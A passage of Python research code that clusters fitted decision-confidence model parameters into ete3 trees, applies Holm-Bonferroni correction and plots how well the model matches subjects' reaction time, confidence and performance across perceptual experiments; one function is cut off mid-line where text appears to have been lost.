individual\n\t\t\t\tparameters are used for the clustering. If 'experiments',\n\t\t\t\tall the parameters that correspond to the same 'name' and\n\t\t\t\t'session' pairs are merged (the different experiments\n\t\t\t\tare pooled together). Analogously, for 'sessions' and\n\t\t\t\t'names' the different session and different name values,\n\t\t\t\tcorrespondingly, are pooled together.\n\t\t\tclustered_parameters: A list of valid Fitter parameter names.\n\t\t\t\tIf None, all the available Fitter parameter names are\n\t\t\t\tused. Each parameter name represents a different dimension\n\t\t\t\tof each parameter array that is passed to the clustering\n\t\t\t\tfit function.\n\t\t\tfilter_nans: A str that can be 'pre', 'post' or 'none' that\n\t\t\t\tindicates if and how the nans should be handled. If\n\t\t\t\t'none', no handling is performed. 
If 'pre', any parameter\n\t\t\t\tarray that holds a nan value in any parameter name, even\n\t\t\t\tif it is not in the clustered_parameters list, is removed.\n\t\t\t\tIf 'post', only the parameters that have a nan value in\n\t\t\t\tone of the clustered_parameters are removed.\n\t\t\n\t\tOutput:\n\t\t\ttree: An ete3.Tree instance that is built from the Newick\n\t\t\t\trepresentation of the\n\t\t\t\tsklearn.cluster.AgglomerativeClustering.fit() tree\n\t\t\t\tstructure.\n\t\t\n\t\t\"\"\"\n\t\tif filter_nans not in ['pre','post','none']:\n\t\t\traise ValueError('filter_nans must be \"pre\", \"post\" or \"none\". User supplied {0}'.format(filter_nans))\n\t\ttry:\n\t\t\tparameter_names = self._parameter_names\n\t\texcept AttributeError:\n\t\t\tself.get_parameter_array_from_summary()\n\t\t\tparameter_names = self._parameter_names\n\t\tclustered_parameters_inds = np.zeros(len(parameter_names),dtype=bool)\n\t\tif clustered_parameters is None:\n\t\t\tclustered_parameters = parameter_names\n\t\tfor cpar in clustered_parameters:\n\t\t\ttry:\n\t\t\t\tindex = parameter_names.index(cpar)\n\t\t\texcept ValueError:\n\t\t\t\traise ValueError('Clustered parameters must be in {0}. User supplied {1}'.format(parameter_names,cpar))\n\t\t\tclustered_parameters_inds[index] = True\n\t\t\n\t\tif merge is None:\n\t\t\tX = self._parameters\n\t\t\tleaf_labels = [str(e).strip('\\x00')+'_subj_'+str(n).strip('\\x00')+'_ses_'+str(s).strip('\\x00') for e,n,s in zip(self._experiments,self._names,self._sessions)]\n\t\telse:\n\t\t\tuexps,invexps = np.unique(self._experiments,return_inverse=True)\n\t\t\tusess,invsess = np.unique(self._sessions,return_inverse=True)\n\t\t\tunams,invnams = np.unique(self._names,return_inverse=True)\n\t\t\tX = []\n\t\t\tleaf_labels = []\n\t\t\tif merge=='experiments':\n\t\t\t\tfor i,us in enumerate(usess):\n\t\t\t\t\tfor j,un in enumerate(unams):\n\t\t\t\t\t\tinds = np.logical_and(invsess==i,invnams==j)\n\t\t\t\t\t\tif any(inds):\n\t\t\t\t\t\t\tX.append(self.pooling_func(self._parameters[inds],axis=0))\n\t\t\t\t\t\t\tleaf_labels.append('subj_'+str(un)+'_ses_'+str(us))\n\t\t\telif merge=='sessions':\n\t\t\t\tfor i,ue in enumerate(uexps):\n\t\t\t\t\tfor j,un in enumerate(unams):\n\t\t\t\t\t\tinds = np.logical_and(invexps==i,invnams==j)\n\t\t\t\t\t\tif any(inds):\n\t\t\t\t\t\t\tX.append(self.pooling_func(self._parameters[inds],axis=0))\n\t\t\t\t\t\t\tleaf_labels.append(str(ue)+'_subj_'+str(un))\n\t\t\telif merge=='names':\n\t\t\t\tfor i,us in enumerate(usess):\n\t\t\t\t\tfor j,ue in enumerate(uexps):\n\t\t\t\t\t\tinds = np.logical_and(invsess==i,invexps==j)\n\t\t\t\t\t\tif any(inds):\n\t\t\t\t\t\t\tX.append(self.pooling_func(self._parameters[inds],axis=0))\n\t\t\t\t\t\t\tleaf_labels.append(str(ue)+'_ses_'+str(us))\n\t\t\telse:\n\t\t\t\traise ValueError('Unknown merge option: {0}'.format(merge))\n\t\t\tX = np.array(X)\n\t\t# Select X\n\t\tif filter_nans=='pre':\n\t\t\tX = X[np.logical_not(np.any(np.isnan(X),axis=1))]\n\t\tX = X[:,clustered_parameters_inds]\n\t\tif filter_nans=='post':\n\t\t\tX = X[np.logical_not(np.any(np.isnan(X),axis=1))]\n\t\tself.agg_clusterer.fit(X)\n\t\tnewick_tree = self.build_Newick_tree(self.agg_clusterer.children_,self.agg_clusterer.n_leaves_,X,leaf_labels)\n\t\ttree = ete3.Tree(newick_tree)\n\t\treturn tree\n\t\n\tdef build_Newick_tree(self,children,n_leaves,X,leaf_labels):\n\t\t\"\"\"\n\t\tself.build_Newick_tree(children,n_leaves,X,leaf_labels)\n\t\t\n\t\tGet a string representation (Newick tree) from the sklearn\n\t\tAgglomerativeClustering.fit output.\n\t\t\n\t\tInput:\n\t\t\tchildren: 
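# --- Hedged sketch (not from the original source): the 'pre'/'post' filter_nans
# options above differ only in whether rows are dropped before or after
# restricting to the clustered columns. A compact standalone equivalent:
import numpy as np

def select_and_filter(X, column_mask, filter_nans='post'):
    X = np.asarray(X, dtype=float)
    if filter_nans == 'pre':            # drop rows with a NaN in ANY column
        X = X[~np.isnan(X).any(axis=1)]
    X = X[:, column_mask]               # keep only the clustered parameters
    if filter_nans == 'post':           # drop rows with a NaN in the KEPT columns
        X = X[~np.isnan(X).any(axis=1)]
    return X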
AgglomerativeClustering.children_\n\t\t\tn_leaves: AgglomerativeClustering.n_leaves_\n\t\t\tX: parameters supplied to AgglomerativeClustering.fit\n\t\t\tleaf_labels: The label of each parameter array in X\n\t\t\n\t\tOutput:\n\t\t\tntree: A str with the Newick tree representation\n\t\t\n\t\t\"\"\"\n\t\treturn self.go_down_tree(children,n_leaves,X,leaf_labels,len(children)+n_leaves-1)[0]+';'\n\t\n\tdef go_down_tree(self,children,n_leaves,X,leaf_labels,nodename):\n\t\t\"\"\"\n\t\tself.go_down_tree(children,n_leaves,X,leaf_labels,nodename)\n\t\t\n\t\tIterative function that traverses the subtree that descends from\n\t\tnodename and returns the Newick representation of the subtree.\n\t\t\n\t\tInput:\n\t\t\tchildren: AgglomerativeClustering.children_\n\t\t\tn_leaves: AgglomerativeClustering.n_leaves_\n\t\t\tX: parameters supplied to AgglomerativeClustering.fit\n\t\t\tleaf_labels: The label of each parameter array in X\n\t\t\tnodename: An int that is the intermediate node name whos\n\t\t\t\tchildren are located in children[nodename-n_leaves].\n\t\t\n\t\tOutput:\n\t\t\tntree: A str with the Newick tree representation\n\t\t\n\t\t\"\"\"\n\t\tnodeindex = nodename-n_leaves\n\t\tif nodename0.05] = np.nan\n\t\tc1s.append(c1)\n\t\t\n\t\t# Test pearson correlation treating the parameters as categories\n\t\tp2 = temp.reshape((-1,temp.shape[-1])).T\n\t\tc2,pval2 = utils.corrcoef(p2,method='pearson')\n\t\t#~ np.fill_diagonal(c2, np.nan)\n\t\t#~ np.fill_diagonal(pval2, np.nan)\n\t\tpval2 = correct_rho_pval(pval2)\n\t\tc2[pval2>0.05] = np.nan\n\t\tc2s.append(c2)\n\t\t\n\texp_alias = {'2AFC':'Con','Auditivo':'Aud','Luminancia':'Lum'}\n\tpar_alias = {'cost':r'$c$',\\\n\t\t\t\t'internal_var':r'$\\sigma^{2}$',\\\n\t\t\t\t'phase_out_prob':r'$p_{po}$',\\\n\t\t\t\t'high_confidence_threshold':r'$C_{H}$',\\\n\t\t\t\t'confidence_map_slope':r'$\\alpha$',\\\n\t\t\t\t'dead_time':r'$\\tau_{c}$',\\\n\t\t\t\t'dead_time_sigma':r'$\\sigma_{c}$'}\n\t\n\tvmin1 = np.nanmin(np.array([np.nanmin(c) for c in c1s]))\n\tvmin2 = np.nanmin(np.array([np.nanmin(c) for c in c2s]))\n\tvmax1 = np.nanmax(np.array([np.nanmax(c) for c in c1s]))\n\tvmax2 = np.nanmax(np.array([np.nanmax(c) for c in c2s]))\n\tplt.figure(figsize=(14,10))\n\tfor i,used_parameters in enumerate(['all','decision','confidence']):\n\t\tused_parameter_names = used_parameter_names_dict[used_parameters]\n\t\t\n\t\tc1 = c1s[i]\n\t\tc2 = c2s[i]\n\t\tax = plt.subplot(gs1[i])\n\t\t#~ ax = plt.subplot(2,3,i+1)\n\t\tplt.imshow(c1,aspect='auto',cmap='jet',interpolation='none',extent=[0,len(c1),0,len(c1)],vmin=vmin1,vmax=vmax1)\n\t\tplt.xticks(np.arange(len(c1))+0.5,[exp_alias[str(e)]+' '+str(s) for e,s in zip(experiments[:,0],sessions[:,0])],rotation=60)\n\t\tplt.yticks(np.arange(len(c1))+0.5,[exp_alias[str(e)]+' '+str(s) for e,s in zip(experiments[:,0],sessions[:,0])][::-1])\n\t\tplt.title('Pars = '+used_parameters)\n\t\tif i==0:\n\t\t\tplt.colorbar(cax=plt.subplot(gs2[0]))\n\t\t\tplt.ylabel('Task correlation')\n\t\t\n\t\tax = plt.subplot(gs1[i+3])\n\t\t#~ ax = plt.subplot(2,3,i+4)\n\t\tplt.imshow(c2,aspect='auto',cmap='jet',interpolation='none',extent=[0,len(c2),0,len(c2)],vmin=vmin2,vmax=vmax2)\n\t\tplt.xticks(np.arange(len(c2))+0.5,[par_alias[p] for p in used_parameter_names],rotation=60,fontsize=14)\n\t\tplt.yticks(np.arange(len(c2))+0.5,[par_alias[p] for p in used_parameter_names][::-1],fontsize=14)\n\t\tif i==0:\n\t\t\tplt.colorbar(cax=plt.subplot(gs2[1]))\n\t\t\tplt.ylabel('Parameter correlation')\n\tplt.show(True)\n\ndef correct_rho_pval(pvals):\n\tout = 
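# --- Hedged sketch (reconstruction for illustration only; part of the recursive
# go_down_tree body above was lost in extraction): sklearn's
# AgglomerativeClustering exposes the merge tree through `children_`, where an
# internal node i >= n_leaves has its two children stored at
# children_[i - n_leaves]. A standard Newick conversion, with branch lengths
# omitted for brevity:
def to_newick(children, n_leaves, leaf_labels, node=None):
    if node is None:
        node = len(children) + n_leaves - 1          # the root is the last merge
    if node < n_leaves:
        return leaf_labels[node]                     # leaf: just its label
    left, right = children[node - n_leaves]
    return '({0},{1})'.format(
        to_newick(children, n_leaves, leaf_labels, left),
        to_newick(children, n_leaves, leaf_labels, right))

# usage (sketch): tree_str = to_newick(model.children_, model.n_leaves_, labels) + ';'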
np.empty_like(pvals)\n\tout[:,:] = pvals[:,:]\n\tps = []\n\tfor rowind,row in enumerate(pvals):\n\t\tfor pval in row[rowind+1:]:\n\t\t\tps.append(pval)\n\tps = utils.holm_bonferroni(np.array(ps))\n\tcounter = 0\n\tfor j,pj in enumerate(pvals):\n\t\tfor k,pk in enumerate(pvals[j+1:]):\n\t\t\tout[j,j+k+1] = ps[counter]\n\t\t\tout[j+k+1,j] = ps[counter]\n\t\t\tcounter+=1\n\treturn out\n\ndef binary_confidence_analysis(analyzer_kwargs={}):\n\ta = Analyzer(**analyzer_kwargs)\n\tparameters,parameter_names,names,sessions,experiments = \\\n\t\ta.get_parameter_array_from_summary(normalize={'internal_var':'experiment'})\n\t#~ parameters,parameter_names,names,sessions,experiments = \\\n\t\t#~ a.get_parameter_array_from_summary(normalize={'internal_var':'experiment',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'confidence_map_slope':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'cost':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'high_confidence_threshold':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'dead_time':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'dead_time_sigma':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'phase_out_prob':'all'})\n\t\n\tsubj_rt = []\n\tsubj_hit_rt = []\n\tsubj_miss_rt = []\n\tsubj_perf = []\n\tsubj_conf = []\n\tsubj_hit_conf = []\n\tsubj_miss_conf = []\n\tsubj_median_conf = []\n\tmodel_rt = []\n\tmodel_hit_rt = []\n\tmodel_miss_rt = []\n\tmodel_perf = []\n\tmodel_conf = []\n\tmodel_hit_conf = []\n\tmodel_miss_conf = []\n\tmodel_median_conf = []\n\texperiments = []\n\tsessions = []\n\tnames = []\n\tsummary = a.summary\n\tsubjects = io.filter_subjects_list(io.unique_subject_sessions(fits.raw_data_dir),'all_sessions_by_experiment')\n\tfor k in summary['theoretical'].keys():\n\t\tvals = summary['theoretical'][k]\n\t\tsubj_key = '_'.join(['experiment_'+vals['experiment'],'subject_'+str(vals['name']),'session_'+str(vals['session'])])\n\t\tsubj_vals = summary['experimental'][subj_key]\n\t\ttry:\n\t\t\tnames.append(int(vals['name']))\n\t\texcept:\n\t\t\tnames.append(vals['name'])\n\t\ttry:\n\t\t\tsessions.append(int(vals['session']))\n\t\texcept:\n\t\t\tsessions.append(vals['session'])\n\t\texperiments.append(vals['experiment'])\n\t\tsubj_rt.append(np.array([subj_vals['means']['rt'],subj_vals['stds']['rt']]))\n\t\tsubj_hit_rt.append(np.array([subj_vals['means']['hit_rt'],subj_vals['stds']['hit_rt']]))\n\t\tsubj_miss_rt.append(np.array([subj_vals['means']['miss_rt'],subj_vals['stds']['miss_rt']]))\n\t\tsubj_perf.append(np.array([subj_vals['means']['performance'],subj_vals['stds']['performance']]))\n\t\tsubj_conf.append(np.array([subj_vals['means']['confidence'],subj_vals['stds']['confidence']]))\n\t\tsubj_hit_conf.append(np.array([subj_vals['means']['hit_confidence'],subj_vals['stds']['hit_confidence']]))\n\t\tsubj_miss_conf.append(np.array([subj_vals['means']['miss_confidence'],subj_vals['stds']['miss_confidence']]))\n\t\tmodel_rt.append(vals['rt'])\n\t\tmodel_hit_rt.append(vals['hit_rt'])\n\t\tmodel_miss_rt.append(vals['miss_rt'])\n\t\tmodel_perf.append(vals['performance'])\n\t\tmodel_conf.append(vals['confidence'])\n\t\tmodel_hit_conf.append(vals['hit_confidence'])\n\t\tmodel_miss_conf.append(vals['miss_confidence'])\n\t\t\n\t\tsubject = [s for s in subjects if s.experiment==vals['experiment'] and s.get_name()==str(vals['name']) and s.get_session()==str(vals['session'])][0]\n\t\tdata = subject.load_data()\n\t\tsubj_median_conf.append(np.median(data[:,3]))\n\t\tmodel_median_conf.append(vals['parameters']['high_confidence_threshold'])\n\tsubj_rt = np.array(subj_rt)\n\tsubj_hit_rt = 
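# --- Hedged sketch (illustrative): correct_rho_pval above walks the symmetric
# p-value matrix with explicit loops. np.triu_indices does the same collect /
# correct / mirror dance in a few lines; `correct` is assumed to behave like
# the author's utils.holm_bonferroni (corrected p-values in the input order).
import numpy as np

def correct_symmetric_pvals(pvals, correct):
    out = pvals.copy()
    iu = np.triu_indices_from(pvals, k=1)    # strictly upper triangle
    corrected = correct(pvals[iu])
    out[iu] = corrected
    out[(iu[1], iu[0])] = corrected          # mirror into the lower triangle
    return out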
np.array(subj_hit_rt)\n\tsubj_miss_rt = np.array(subj_miss_rt)\n\tsubj_conf = np.array(subj_conf)\n\tsubj_hit_conf = np.array(subj_hit_conf)\n\tsubj_miss_conf = np.array(subj_miss_conf)\n\tsubj_perf = np.array(subj_perf)\n\tplt.figure(figsize=(14,10))\n\tplt.subplot(241)\n\tplt.errorbar(model_rt,subj_rt[:,0],subj_rt[:,1],marker='.',linestyle='')\n\txlim = list(plt.gca().get_xlim())\n\tylim = list(plt.gca().get_ylim())\n\txlim[0] = min([xlim[0],ylim[0]])\n\txlim[1] = max([xlim[1],ylim[1]])\n\tplt.plot(xlim,xlim,'--r')\n\tplt.gca().set_xlim(xlim)\n\tplt.gca().set_ylim(xlim)\n\tplt.ylabel('Subject')\n\tplt.title('Mean RT')\n\t\n\tplt.subplot(242)\n\tplt.errorbar(model_hit_rt,subj_hit_rt[:,0],subj_hit_rt[:,1],marker='.',linestyle='')\n\txlim = list(plt.gca().get_xlim())\n\tylim = plt.gca().get_ylim()\n\txlim[0] = min([xlim[0],ylim[0]])\n\txlim[1] = max([xlim[1],ylim[1]])\n\tplt.plot(xlim,xlim,'--r')\n\tplt.gca().set_xlim(xlim)\n\tplt.gca().set_ylim(xlim)\n\tplt.title('Mean hit RT')\n\t\n\tplt.subplot(243)\n\tplt.errorbar(model_miss_rt,subj_miss_rt[:,0],subj_miss_rt[:,1],marker='.',linestyle='')\n\txlim = list(plt.gca().get_xlim())\n\tylim = plt.gca().get_ylim()\n\txlim[0] = min([xlim[0],ylim[0]])\n\txlim[1] = max([xlim[1],ylim[1]])\n\tplt.plot(xlim,xlim,'--r')\n\tplt.gca().set_xlim(xlim)\n\tplt.gca().set_ylim(xlim)\n\tplt.title('Mean miss RT')\n\t\n\tplt.subplot(244)\n\tplt.errorbar(model_perf,subj_perf[:,0],subj_perf[:,1],marker='.',linestyle='')\n\txlim = list(plt.gca().get_xlim())\n\tylim = plt.gca().get_ylim()\n\txlim[0] = min([xlim[0],ylim[0]])\n\txlim[1] = max([xlim[1],ylim[1]])\n\tplt.plot(xlim,xlim,'--r')\n\tplt.gca().set_xlim(xlim)\n\tplt.gca().set_ylim(xlim)\n\tplt.title('Mean performance')\n\t\n\tplt.subplot(234)\n\tplt.errorbar(model_conf,subj_conf[:,0],subj_conf[:,1],marker='.',linestyle='')\n\txlim = list(plt.gca().get_xlim())\n\tylim = plt.gca().get_ylim()\n\txlim[0] = min([xlim[0],ylim[0]])\n\txlim[1] = max([xlim[1],ylim[1]])\n\tplt.plot(xlim,xlim,'--r')\n\tplt.gca().set_xlim(xlim)\n\tplt.gca().set_ylim(xlim)\n\tplt.ylabel('Subject')\n\tplt.xlabel('Model')\n\tplt.title('Mean Confidence')\n\t\n\tplt.subplot(235)\n\tplt.errorbar(model_hit_conf,subj_hit_conf[:,0],subj_hit_conf[:,1],marker='.',linestyle='')\n\txlim = list(plt.gca().get_xlim())\n\tylim = plt.gca().get_ylim()\n\txlim[0] = min([xlim[0],ylim[0]])\n\txlim[1] = max([xlim[1],ylim[1]])\n\tplt.plot(xlim,xlim,'--r')\n\tplt.gca().set_xlim(xlim)\n\tplt.gca().set_ylim(xlim)\n\tplt.title('Mean hit Confidence')\n\tplt.xlabel('Model')\n\t\n\tplt.subplot(236)\n\tplt.errorbar(model_miss_conf,subj_miss_conf[:,0],subj_miss_conf[:,1],marker='.',linestyle='')\n\txlim = list(plt.gca().get_xlim())\n\tylim = plt.gca().get_ylim()\n\txlim[0] = min([xlim[0],ylim[0]])\n\txlim[1] = max([xlim[1],ylim[1]])\n\tplt.plot(xlim,xlim,'--r')\n\tplt.gca().set_xlim(xlim)\n\tplt.gca().set_ylim(xlim)\n\tplt.title('Mean miss Confidence')\n\tplt.xlabel('Model')\n\t\n\tplt.show(True)\n\ndef correlation_analysis(analyzer_kwargs={}):\n\ta = Analyzer(**analyzer_kwargs)\n\tsubj,model = a.get_summary_stats_array(normalize={'internal_var':'experiment'})\n\t#~ subj,model = a.get_summary_stats_array(normalize={'internal_var':'experiment',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'confidence_map_slope':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'cost':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'high_confidence_threshold':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'dead_time':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'dead_time_sigma':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 
'phase_out_prob':'all'})\n\t\n\tue,c = np.unique(model['experiment'],return_inverse=True)\n\t\n\tparameter_names = ['cost','internal_var','phase_out_prob','dead_time','dead_time_sigma','high_confidence_threshold','confidence_map_slope']\n\tparameter_aliases = {'cost':r'$c$',\n\t\t\t\t\t\t'internal_var':r'$\\sigma^{2}$',\n\t\t\t\t\t\t'phase_out_prob':r'$p_{po}$',\n\t\t\t\t\t\t'high_confidence_threshold':r'$C_{H}$',\n\t\t\t\t\t\t'confidence_map_slope':r'$\\alpha$',\n\t\t\t\t\t\t'dead_time':r'$\\tau_{c}$',\n\t\t\t\t\t\t'dead_time_sigma':r'$\\sigma_{c}$'}\n\t# Correlation between parameters and mean confidence\n\tplt.figure()\n\taxs = {'cost':plt.subplot(231),\n\t\t\t'internal_var':plt.subplot(232),\n\t\t\t'phase_out_prob':plt.subplot(233),\n\t\t\t'high_confidence_threshold':plt.subplot(245),\n\t\t\t'confidence_map_slope':plt.subplot(246),\n\t\t\t'dead_time':plt.subplot(247),\n\t\t\t'dead_time_sigma':plt.subplot(248)}\n\tylabels = {'cost':'Mean confidence',\n\t\t\t'internal_var':'',\n\t\t\t'phase_out_prob':'',\n\t\t\t'high_confidence_threshold':'Mean confidence',\n\t\t\t'confidence_map_slope':'',\n\t\t\t'dead_time':'',\n\t\t\t'dead_time_sigma':''}\n\tfor par in parameter_names:\n\t\tax = axs[par]\n\t\tax.scatter(model[par],subj['confidence_mean'],c=c)\n\t\tax.set_xlabel(parameter_aliases[par])\n\t\tax.set_ylabel(ylabels[par])\n\tplt.suptitle('Correlation between parameters and mean confidence')\n\t\n\t# Correlation between parameters and mean RT\n\tplt.figure()\n\taxs = {'cost':plt.subplot(231),\n\t\t\t'internal_var':plt.subplot(232),\n\t\t\t'phase_out_prob':plt.subplot(233),\n\t\t\t'high_confidence_threshold':plt.subplot(245),\n\t\t\t'confidence_map_slope':plt.subplot(246),\n\t\t\t'dead_time':plt.subplot(247),\n\t\t\t'dead_time_sigma':plt.subplot(248)}\n\tylabels['cost'] = ylabels['high_confidence_threshold'] = 'Mean RT'\n\tfor par in parameter_names:\n\t\tax = axs[par]\n\t\tax.scatter(model[par],subj['rt_mean'],c=c)\n\t\tax.set_xlabel(parameter_aliases[par])\n\t\tax.set_ylabel(ylabels[par])\n\tplt.suptitle('Correlation between parameters and mean RT')\n\t\n\t# Correlation between parameters and mean performance\n\tplt.figure()\n\taxs = {'cost':plt.subplot(231),\n\t\t\t'internal_var':plt.subplot(232),\n\t\t\t'phase_out_prob':plt.subplot(233),\n\t\t\t'high_confidence_threshold':plt.subplot(245),\n\t\t\t'confidence_map_slope':plt.subplot(246),\n\t\t\t'dead_time':plt.subplot(247),\n\t\t\t'dead_time_sigma':plt.subplot(248)}\n\tylabels['cost'] = ylabels['high_confidence_threshold'] = 'Mean performance'\n\tfor par in parameter_names:\n\t\tax = axs[par]\n\t\tax.scatter(model[par],subj['performance_mean'],c=c)\n\t\tax.set_xlabel(parameter_aliases[par])\n\t\tax.set_ylabel(ylabels[par])\n\tplt.suptitle('Correlation between parameters and mean performance')\n\t\n\tfrom scipy.stats import linregress, ttest_rel, ttest_ind, ttest_1samp\n\t# Agreement between data means and fit\n\tf = plt.figure()\n\taxs = {'rt':plt.subplot(231),'confidence':plt.subplot(232),\n\t\t 'performance':plt.subplot(233),'hit_rt':plt.subplot(245),\n\t\t 'miss_rt':plt.subplot(246),'hit_confidence':plt.subplot(247),\n\t\t 'miss_confidence':plt.subplot(248)}\n\ttitles = {'rt':'Mean RT','confidence':'Mean confidence',\n\t\t\t 'performance':'Mean performance','hit_rt':'Mean RT for hits',\n\t\t\t 'miss_rt':'Mean RT for misses','hit_confidence':'Mean conf for hits',\n\t\t\t 'miss_confidence':'Mean conf for misses'}\n\tylabels = {'rt':'Subject data','confidence':'','performance':'',\n\t\t\t 'hit_rt':'Subject data','miss_rt':'',\n\t\t\t 
'hit_confidence':'','miss_confidence':''}\n\txlabels = {'rt':'','confidence':'','performance':'',\n\t\t\t 'hit_rt':'Model data','miss_rt':'Model data',\n\t\t\t 'hit_confidence':'Model data','miss_confidence':'Model data'}\n\tfor key in axs.keys():\n\t\tax = axs[key]\n\t\tfor i,exp in enumerate(ue):\n\t\t\tcolor = plt.get_cmap('jet')(float(i)/float(len(ue)-1))\n\t\t\tinds = c==i\n\t\t\tlabel = {'2AFC':'Contrast','Auditivo':'Auditory','Luminancia':'Luminance'}[str(exp).strip('\\x00')]\n\t\t\tax.errorbar(model[key+'_mean'][inds],subj[key+'_mean'][inds],subj[key+'_std'][inds],linestyle='',marker='o',color=color,label=label)\n\t\tslope,intercept,rvalue,_,stder = linregress(model[key+'_mean'],subj[key+'_mean'])\n\t\tpar,cov = utils.linear_least_squares(model[key+'_mean'],subj[key+'_mean'],subj[key+'_std'])\n\t\ttvalue,pvalue = ttest_1samp(subj[key+'_mean']-model[key+'_mean'],0.)\n\t\ttitle = titles[key]\n\t\t#~ if pvalue<0.05:\n\t\t\t#~ title+=' *'\n\t\t\t#~ if pvalue<0.005:\n\t\t\t\t#~ title+='*'\n\t\t\t\t#~ if pvalue<0.0005:\n\t\t\t\t\t#~ title+='*'\n\t\tax.set_title(title)\n\t\tax.set_xlabel(xlabels[key])\n\t\tax.set_ylabel(ylabels[key])\n\t\txlim = np.array(ax.get_xlim())\n\t\tylim = np.array(ax.get_ylim())\n\t\txlim[0] = min([xlim[0],ylim[0]])\n\t\txlim[1] = max([xlim[1],ylim[1]])\n\t\tylim = xlim\n\t\txlsq = np.linspace(xlim[0],xlim[1],1000)\n\t\tylsq,sylsq = utils.linear_least_squares_prediction(xlsq,par,cov)\n\t\tax.plot(xlsq,ylsq,color='gray',linewidth=2)\n\t\tax.fill_between(xlsq,ylsq-2*sylsq,ylsq+2*sylsq,facecolor='gray',alpha=0.4,interpolate=True)\n\t\tax.plot(xlim,xlim,color='k',linewidth=2)\n\t\tax.set_xlim(xlim)\n\t\tax.set_ylim(ylim)\n\t\tif key=='rt':\n\t\t\tax.legend(loc='best', fancybox=True, framealpha=0.5)\n\tplt.figure(f.number)\n\tutils.maximize_figure()\n\tplt.suptitle('Agreement between data means and fit',fontsize=18)\n\t\n\t# Agreement between data medians and fit\n\tplt.figure()\n\taxs = {'rt':plt.subplot(221),'confidence':plt.subplot(222),\n\t\t 'hit_rt':plt.subplot(245),'miss_rt':plt.subplot(246),\n\t\t 'hit_confidence':plt.subplot(247),'miss_confidence':plt.subplot(248)}\n\ttitles = {'rt':'Median RT','confidence':'Median confidence',\n\t\t\t 'hit_rt':'Median RT for hits','miss_rt':'Median RT for misses',\n\t\t\t 'hit_confidence':'Median conf for hits',\n\t\t\t 'miss_confidence':'Median conf for misses'}\n\tylabels = {'rt':'Subject data','confidence':'',\n\t\t\t 'hit_rt':'Subject data','miss_rt':'',\n\t\t\t 'hit_confidence':'','miss_confidence':''}\n\txlabels = {'rt':'','confidence':'',\n\t\t\t 'hit_rt':'Model data','miss_rt':'Model data',\n\t\t\t 'hit_confidence':'Model data','miss_confidence':'Model data'}\n\tfor key in axs.keys():\n\t\tax = axs[key]\n\t\tfor i,exp in enumerate(ue):\n\t\t\tcolor = plt.get_cmap('jet')(float(i)/float(len(ue)-1))\n\t\t\tinds = c==i\n\t\t\tlabel = {'2AFC':'Contrast','Auditivo':'Auditory','Luminancia':'Luminance'}[str(exp).strip('\\x00')]\n\t\t\tax.errorbar(model[key+'_median'][inds],subj[key+'_median'][inds],subj[key+'_std'][inds],linestyle='',marker='o',color=color,label=label)\n\t\t#~ slope,intercept,rvalue,_,stder = linregress(model[key+'_median'],subj[key+'_median'])\n\t\tpar,cov = utils.linear_least_squares(model[key+'_median'],subj[key+'_median'],subj[key+'_std'])\n\t\ttvalue,pvalue = ttest_1samp(subj[key+'_median']-model[key+'_median'],0.)\n\t\t#~ print(key,np.mean(subj[key+'_median']-model[key+'_median']),tvalue,pvalue)\n\t\ttitle = titles[key]\n\t\tif key=='rt':\n\t\t\tax.legend(loc='best', fancybox=True, 
framealpha=0.5)\n\t\t#~ if pvalue<0.05:\n\t\t\t#~ title+=' *'\n\t\t\t#~ if pvalue<0.005:\n\t\t\t\t#~ title+='*'\n\t\t\t\t#~ if pvalue<0.0005:\n\t\t\t\t\t#~ title+='*'\n\t\tax.set_title(title)\n\t\tax.set_xlabel(xlabels[key])\n\t\tax.set_ylabel(ylabels[key])\n\t\txlim = np.array(ax.get_xlim())\n\t\tylim = np.array(ax.get_ylim())\n\t\txlim[0] = min([xlim[0],ylim[0]])\n\t\txlim[1] = max([xlim[1],ylim[1]])\n\t\tylim = xlim\n\t\txlsq = np.linspace(xlim[0],xlim[1],1000)\n\t\tylsq,sylsq = utils.linear_least_squares_prediction(xlsq,par,cov)\n\t\tax.plot(xlsq,ylsq,color='gray',linewidth=2)\n\t\tax.fill_between(xlsq,ylsq-2*sylsq,ylsq+2*sylsq,facecolor='gray',alpha=0.4,interpolate=True)\n\t\tax.plot(xlim,xlim,color='k',linewidth=2)\n\t\tax.set_xlim(xlim)\n\t\tax.set_ylim(ylim)\n\tutils.maximize_figure()\n\tplt.suptitle('Agreement between data medians and fit',fontsize=18)\n\t\n\t# Correlation between parameters and: mean RT, performance, mean confidence, AUC and multi mod index\n\tstudied_parameters = [par for par in parameter_names if par not in ['dead_time','dead_time_sigma']]\n\tparameters = np.array([model[par] for par in studied_parameters])\n\tgroup_width = 0.9\n\tbar_width = group_width/5\n\tbar_pos = np.arange(parameters.shape[0])\n\tgroup_center = bar_pos+0.5*group_width\n\tplt.figure()\n\tcolors = ['r','g','b','y','m']\n\tstudied_stats = ['rt_mean','performance_mean','confidence_mean','auc','multi_mod_index']\n\tstat_aliases = {'rt_mean':'Mean RT','performance_mean':'Performance',\n\t\t\t\t\t'confidence_mean':'Mean Confidence',\n\t\t\t\t\t'auc':'AUC','multi_mod_index':\"Hartigan's DIP\"}\n\tbars = []\n\tpvals = []\n\tsigns = []\n\tax1 = plt.subplot(211)\n\tax2 = plt.subplot(212)\n\tfor i,stat in enumerate(studied_stats):\n\t\tcorr,pval = utils.corrcoef(subj[stat],parameters)\n\t\tcorr = corr[0,1:]\n\t\tpval = pval[0,1:]\n\t\tpvals.append(pval)\n\t\tbars.append(ax1.bar(bar_pos+i*bar_width,np.abs(corr),bar_width,color=colors[i]))\n\t\tax2.bar(bar_pos+i*bar_width,corr,bar_width,color=colors[i])\n\t\tsigns.append(np.sign(corr))\n\tpvals = np.array(pvals)\n\tsh = pvals.shape\n\tpvals = 